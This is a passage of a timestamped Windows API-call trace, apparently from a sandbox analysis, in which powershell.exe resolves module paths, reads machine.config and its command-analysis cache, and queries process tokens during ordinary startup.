lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0178.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0178.363] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0178.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0178.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0178.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0178.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0178.365] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0178.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0178.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0178.398] CoTaskMemAlloc (cb=0x20e) returned 0x5b1170 [0178.398] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x5b1170, nSize=0x105 | out: lpBuffer="") returned 0x0 [0178.398] CoTaskMemFree (pv=0x5b1170) [0178.406] CoTaskMemAlloc (cb=0x20c) returned 0x5b1170 [0178.406] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5b1170 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0178.408] CoTaskMemFree (pv=0x5b1170) [0178.408] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0178.410] GetCurrentProcess () returned 0xffffffffffffffff [0178.410] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7de6c8 | out: TokenHandle=0x1b7de6c8*=0x688) returned 1 [0178.411] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b7de7c8 | out: TokenInformation=0x0, ReturnLength=0x1b7de7c8) returned 0 [0178.411] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1a883ff0 [0178.411] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x1a883ff0, TokenInformationLength=0x2c, ReturnLength=0x1b7de7c8 | out: TokenInformation=0x1a883ff0, ReturnLength=0x1b7de7c8) returned 1 [0178.411] LocalFree (hMem=0x1a883ff0) returned 0x0 [0178.414] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x240ca58, cbSid=0x1b7de7c0 | out: pSid=0x240ca58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x1b7de7c0) returned 1 [0178.418] CreateMutexW (lpMutexAttributes=0x240cc18, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x684 [0178.421] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7de660*=0x684, lpdwindex=0x1b7de434 | out: lpdwindex=0x1b7de434) returned 0x0 [0178.862] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7de1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0178.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5e0) returned 1 [0178.862] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7de6c0 | out: lpFileInformation=0x1b7de6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0178.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5a0) returned 1 [0179.029] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b7de040, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0179.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de520) returned 1 [0179.029] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x68c [0179.102] GetFileType (hFile=0x68c) returned 0x1 [0179.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de490) returned 1 [0179.102] GetFileType (hFile=0x68c) returned 0x1 [0179.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7dcc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0179.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7dcb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0179.437] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b0e00 [0179.437] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a9b0e00, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0179.437] CoTaskMemFree (pv=0x1a9b0e00) [0179.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1b7dcd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0179.448] GetCurrentProcess () returned 0xffffffffffffffff [0179.448] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dcf88 | out: TokenHandle=0x1b7dcf88*=0x690) returned 1 [0179.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x1b7dc9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0179.455] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd040 | out: lpFileInformation=0x1b7dd040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0179.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1b7dc9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0179.457] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd028 | out: lpFileInformation=0x1b7dd028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0179.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1b7dc9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0179.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dcea0) returned 1 [0179.457] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x694 [0179.457] GetFileType (hFile=0x694) returned 0x1 [0179.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dce10) returned 1 [0179.457] GetFileType (hFile=0x694) returned 0x1 [0179.459] GetFileSize (in: hFile=0x694, lpFileSizeHigh=0x1b7dcf78 | out: lpFileSizeHigh=0x1b7dcf78*=0x0) returned 0x8c8f [0179.459] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dcee8, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dcee8*=0x1000, lpOverlapped=0x0) returned 1 [0179.468] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dccc8, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dccc8*=0x1000, lpOverlapped=0x0) returned 1 [0179.469] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dcab8, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dcab8*=0x1000, lpOverlapped=0x0) returned 1 [0179.469] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dcab8, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dcab8*=0x1000, lpOverlapped=0x0) returned 1 [0179.470] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dcab8, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dcab8*=0x1000, lpOverlapped=0x0) returned 1 [0179.470] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dc978, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dc978*=0x1000, lpOverlapped=0x0) returned 1 [0179.477] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dcbb8, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dcbb8*=0x1000, lpOverlapped=0x0) returned 1 [0179.479] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dca68, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dca68*=0x1000, lpOverlapped=0x0) returned 1 [0179.479] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dca68, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dca68*=0xc8f, lpOverlapped=0x0) returned 1 [0179.479] ReadFile (in: hFile=0x694, lpBuffer=0x2411530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dcb88, lpOverlapped=0x0 | out: lpBuffer=0x2411530*, lpNumberOfBytesRead=0x1b7dcb88*=0x0, lpOverlapped=0x0) returned 1 [0179.479] CloseHandle (hObject=0x694) returned 1 [0179.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7dcd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0179.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7dcbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0179.480] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b2340 [0179.480] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a9b2340, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0179.480] CoTaskMemFree (pv=0x1a9b2340) [0179.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1b7dcda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0179.480] GetCurrentProcess () returned 0xffffffffffffffff [0179.480] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dd188 | out: TokenHandle=0x1b7dd188*=0x694) returned 1 [0179.481] GetCurrentProcess () returned 0xffffffffffffffff [0179.481] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dd188 | out: TokenHandle=0x1b7dd188*=0x698) returned 1 [0179.482] GetCurrentProcess () returned 0xffffffffffffffff [0179.482] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dcf88 | out: TokenHandle=0x1b7dcf88*=0x69c) returned 1 [0179.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd040 | out: lpFileInformation=0x1b7dd040*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7dc9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0179.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd028 | out: lpFileInformation=0x1b7dd028*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.485] GetCurrentProcess () returned 0xffffffffffffffff [0179.485] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dd188 | out: TokenHandle=0x1b7dd188*=0x6a0) returned 1 [0179.518] GetCurrentProcess () returned 0xffffffffffffffff [0179.518] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dd188 | out: TokenHandle=0x1b7dd188*=0x6a4) returned 1 [0179.533] GetCurrentProcess () returned 0xffffffffffffffff [0179.533] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dced8 | out: TokenHandle=0x1b7dced8*=0x6a8) returned 1 [0179.597] GetCurrentProcess () returned 0xffffffffffffffff [0179.597] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dcee8 | out: TokenHandle=0x1b7dcee8*=0x6ac) returned 1 [0179.695] ReadFile (in: hFile=0x68c, lpBuffer=0x2439348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de388, lpOverlapped=0x0 | out: lpBuffer=0x2439348*, lpNumberOfBytesRead=0x1b7de388*=0x8a2, lpOverlapped=0x0) returned 1 [0179.763] EtwEventRegister () returned 0x0 [0179.825] GetCurrentProcess () returned 0xffffffffffffffff [0179.825] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7ddd28 | out: TokenHandle=0x1b7ddd28*=0x6b4) returned 1 [0179.827] GetCurrentProcess () returned 0xffffffffffffffff [0179.827] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7ddd38 | out: TokenHandle=0x1b7ddd38*=0x6b8) returned 1 [0180.759] ReadFile (in: hFile=0x68c, lpBuffer=0x2439348, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de358, lpOverlapped=0x0 | out: lpBuffer=0x2439348*, lpNumberOfBytesRead=0x1b7de358*=0x0, lpOverlapped=0x0) returned 1 [0180.795] CloseHandle (hObject=0x68c) returned 1 [0180.796] CoTaskMemAlloc (cb=0x20e) returned 0x1a9b0e00 [0180.796] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoloadingCacheMaintenance", lpBuffer=0x1a9b0e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0180.796] CoTaskMemFree (pv=0x1a9b0e00) [0180.798] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b2340 [0180.798] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9b2340 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0180.798] CoTaskMemFree (pv=0x1a9b2340) [0180.798] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0180.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7de1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0180.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5f0) returned 1 [0180.799] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de6d0 | out: lpFileInformation=0x1b7de6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0180.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0180.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7de1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0180.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5f0) returned 1 [0180.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de6d0 | out: lpFileInformation=0x1b7de6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0180.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0180.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x1b7de1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0180.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5f0) returned 1 [0180.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de6d0 | out: lpFileInformation=0x1b7de6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1 [0180.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0180.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", nBufferLength=0x105, lpBuffer=0x1b7de1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", lpFilePart=0x0) returned 0x7c [0180.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5f0) returned 1 [0180.802] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de6d0 | out: lpFileInformation=0x1b7de6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c)) returned 1 [0180.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0180.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0x1b7de1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77 [0180.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5f0) returned 1 [0180.802] 